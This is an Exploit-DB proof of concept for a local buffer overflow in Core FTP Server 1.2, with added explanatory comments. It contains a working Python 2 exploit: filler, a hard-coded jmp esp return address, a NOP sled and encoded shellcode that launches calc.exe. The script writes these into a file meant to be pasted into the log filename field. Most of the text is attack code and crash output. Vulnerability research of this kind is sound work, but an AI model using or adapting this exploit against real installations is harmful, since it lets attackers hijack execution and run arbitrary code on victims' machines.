Core FTP Server 1.2 – Local Buffer Overflow

  • 作者: INSECT.B
    日期: 2016-02-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39480/
  • #-*- coding: utf-8 -*-
    #
    # Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
    # Date: 2016-02-22
    # Author: INSECT.B
    # Facebook : https://www.facebook.com/B.INSECT00
    #	GitHub : binsect00
    # Blog : http://binsect00.tistory.com
    # Vendor Homepage : http://www.coreftp.com/
    # Software Link: 
    # Version: 1.2
    # Tested on: Windows7 Professional SP1 En x86 
    # CVE : N/A
    
    '''
    [+] Type : Buffer overflow
    [+] Detail : 
    [-]This is a typical buffer overflow vulnerability. 
    [-]Insert a string into the 'Log filename(include path)' field under [setup] - [new] - [Logging options] - [More] 
    [-]The 'Log filename(include path)' field has no length limit, and its length is not checked
    [-]Insert the string "A"*1500 and press OK, OK
    [-] crash info
    (3bc.e28): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
    eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
    41414141 ?????
    '''
    import struct  # only used to pack the 32-bit little-endian address below
    
    # Filler that reaches the saved return address. The crash trace in the
    # docstring shows eip=41414141 after a 1500-byte "A" string; 312 is the
    # offset this PoC settles on (it is not derivable from the visible dump).
    junk = "A" * 312
    # Hard-coded absolute address of a `jmp esp` gadget in USER32
    # (USER32!gSharedInfo+0x181fb: 7795163b ff e4  jmp esp). Presumably it is
    # only valid for the tested image (Windows 7 SP1 x86, see header), which
    # is why the PoC is tied to that configuration -- TODO confirm.
    EIP = struct.pack("<L",0x7795163b)
    # Short NOP sled (0x90 is the x86 NOP opcode) ahead of the encoded payload.
    nop = "\x90" * 10
    
    #windows/exec calc.exe
    #encode : alpha_mixed
    # NOTE: "sehll" is a typo for "shell" in the original; the name is kept
    # unchanged because `payload` below refers to it.
    sehll = (
    "\x89\xe5\xdb\xde\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" +
    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
    "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
    "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
    "\x75\x4a\x49\x59\x6c\x68\x68\x6f\x72\x67\x70\x77\x70\x47" +
    "\x70\x75\x30\x6f\x79\x4a\x45\x44\x71\x49\x50\x30\x64\x6c" +
    "\x4b\x56\x30\x34\x70\x4e\x6b\x61\x42\x56\x6c\x6c\x4b\x71" +
    "\x42\x77\x64\x4c\x4b\x32\x52\x67\x58\x76\x6f\x6c\x77\x71" +
    "\x5a\x31\x36\x65\x61\x49\x6f\x4e\x4c\x67\x4c\x53\x51\x61" +
    "\x6c\x37\x72\x44\x6c\x47\x50\x4f\x31\x38\x4f\x54\x4d\x36" +
    "\x61\x58\x47\x58\x62\x69\x62\x46\x32\x51\x47\x6c\x4b\x61" +
    "\x42\x46\x70\x6c\x4b\x52\x6a\x75\x6c\x6e\x6b\x42\x6c\x34" +
    "\x51\x30\x78\x79\x73\x72\x68\x65\x51\x7a\x71\x30\x51\x6c" +
    "\x4b\x53\x69\x57\x50\x43\x31\x58\x53\x4c\x4b\x62\x69\x76" +
    "\x78\x58\x63\x75\x6a\x37\x39\x4c\x4b\x75\x64\x6c\x4b\x36" +
    "\x61\x4e\x36\x54\x71\x69\x6f\x6e\x4c\x5a\x61\x5a\x6f\x54" +
    "\x4d\x43\x31\x58\x47\x45\x68\x59\x70\x32\x55\x4b\x46\x64" +
    "\x43\x51\x6d\x58\x78\x45\x6b\x31\x6d\x55\x74\x50\x75\x48" +
    "\x64\x42\x78\x6c\x4b\x32\x78\x77\x54\x67\x71\x38\x53\x63" +
    "\x56\x4c\x4b\x66\x6c\x62\x6b\x6e\x6b\x52\x78\x35\x4c\x63" +
    "\x31\x68\x53\x6e\x6b\x45\x54\x4c\x4b\x46\x61\x5a\x70\x6c" +
    "\x49\x47\x34\x65\x74\x31\x34\x61\x4b\x31\x4b\x75\x31\x43" +
    "\x69\x52\x7a\x36\x31\x6b\x4f\x59\x70\x73\x6f\x63\x6f\x32" +
    "\x7a\x4c\x4b\x45\x42\x78\x6b\x6e\x6d\x43\x6d\x31\x7a\x63" +
    "\x31\x6c\x4d\x6c\x45\x4e\x52\x75\x50\x77\x70\x47\x70\x50" +
    "\x50\x63\x58\x66\x51\x4e\x6b\x62\x4f\x6b\x37\x6b\x4f\x7a" +
    "\x75\x6f\x4b\x4c\x30\x68\x35\x6f\x52\x61\x46\x43\x58\x69" +
    "\x36\x7a\x35\x4d\x6d\x4f\x6d\x69\x6f\x68\x55\x65\x6c\x56" +
    "\x66\x33\x4c\x37\x7a\x4d\x50\x49\x6b\x79\x70\x51\x65\x37" +
    "\x75\x4f\x4b\x31\x57\x75\x43\x61\x62\x70\x6f\x73\x5a\x73" +
    "\x30\x46\x33\x39\x6f\x6a\x75\x70\x63\x45\x31\x42\x4c\x63" +
    "\x53\x74\x6e\x71\x75\x31\x68\x73\x55\x57\x70\x41\x41"
    )
    # Python 2 semantics: every part is a byte-oriented `str`, so plain
    # concatenation works. Under Python 3 struct.pack() returns bytes while
    # "A" * 312 is text, and this line raises TypeError.
    payload = junk + EIP + nop + sehll
    
    # Writes the raw payload to a file in the current directory; per the
    # docstring it is meant to be pasted into the 'Log filename(include path)'
    # field. The fix belongs in the application: enforce and validate a length
    # limit on that field (the docstring notes its length is never checked).
    with open("CoreFTPServer_Ex.txt","wb") as f :
    	f.write(payload)